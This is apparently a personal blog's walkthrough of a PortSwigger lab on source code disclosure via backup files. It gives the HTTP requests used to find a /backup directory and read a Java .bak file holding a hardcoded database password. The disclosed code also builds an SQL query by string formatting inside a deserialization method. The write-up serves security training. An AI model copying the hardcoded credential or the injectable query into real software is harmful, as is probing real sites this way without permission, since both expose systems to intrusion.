Skip to content

chojnowski.it

Port Swigger Source code disclosure via backup fil

Port Swigger Source code disclosure via backup fil

Source code disclosure via backup files¶

Solution¶

Open website: https://0a7d00c903464aac83523220009a0077.web-security-academy.net/product?productId=1¶

GET /product?productId=1 HTTP/2
Host: 0a7d00c903464aac83523220009a0077.web-security-academy.net
Cookie: session=nXJuvFYWVn7m2ZdprfCvvAldtkXZ142I
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a7d00c903464aac83523220009a0077.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Open website: https://0a7d00c903464aac83523220009a0077.web-security-academy.net/robots.txt¶

GET /robots.txt HTTP/2
Host: 0a7d00c903464aac83523220009a0077.web-security-academy.net
Cookie: session=nXJuvFYWVn7m2ZdprfCvvAldtkXZ142I
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Open folder /backup: https://0a7d00c903464aac83523220009a0077.web-security-academy.net/backup¶

GET /backup HTTP/2
Host: 0a7d00c903464aac83523220009a0077.web-security-academy.net
Cookie: session=nXJuvFYWVn7m2ZdprfCvvAldtkXZ142I
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Read backup file from: https://0a7d00c903464aac83523220009a0077.web-security-academy.net/backup/ProductTemplate.java.bak¶

Found password: jvm1m60w3lrsnnywjtgkagumuvtv63sx
---
GET /backup/ProductTemplate.java.bak HTTP/2
Host: 0a7d00c903464aac83523220009a0077.web-security-academy.net
Cookie: session=nXJuvFYWVn7m2ZdprfCvvAldtkXZ142I
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a7d00c903464aac83523220009a0077.web-security-academy.net/backup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
package data.productcatalog;

import common.db.JdbcConnectionBuilder;

import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;
import java.sql.Connection;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

public class ProductTemplate implements Serializable
{
    static final long serialVersionUID = 1L;

    private final String id;
    private transient Product product;

    public ProductTemplate(String id)
    {
        this.id = id;
    }

    private void readObject(ObjectInputStream inputStream) throws IOException, ClassNotFoundException
    {
        inputStream.defaultReadObject();

        ConnectionBuilder connectionBuilder = ConnectionBuilder.from(
                "org.postgresql.Driver",
                "postgresql",
                "localhost",
                5432,
                "postgres",
                "postgres",
                "jvm1m60w3lrsnnywjtgkagumuvtv63sx"
        ).withAutoCommit();
        try
        {
            Connection connect = connectionBuilder.connect(30);
            String sql = String.format("SELECT * FROM products WHERE id = '%s' LIMIT 1", id);
            Statement statement = connect.createStatement();
            ResultSet resultSet = statement.executeQuery(sql);
            if (!resultSet.next())
            {
                return;
            }
            product = Product.from(resultSet);
        }
        catch (SQLException e)
        {
            throw new IOException(e);
        }
    }

    public String getId()
    {
        return id;
    }

    public Product getProduct()
    {
        return product;
    }
}

Submit solution¶

POST /submitSolution HTTP/2
Host: 0a7d00c903464aac83523220009a0077.web-security-academy.net
Cookie: session=nXJuvFYWVn7m2ZdprfCvvAldtkXZ142I
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Origin: https://0a7d00c903464aac83523220009a0077.web-security-academy.net
Referer: https://0a7d00c903464aac83523220009a0077.web-security-academy.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

answer=jvm1m60w3lrsnnywjtgkagumuvtv63sx

Solved¶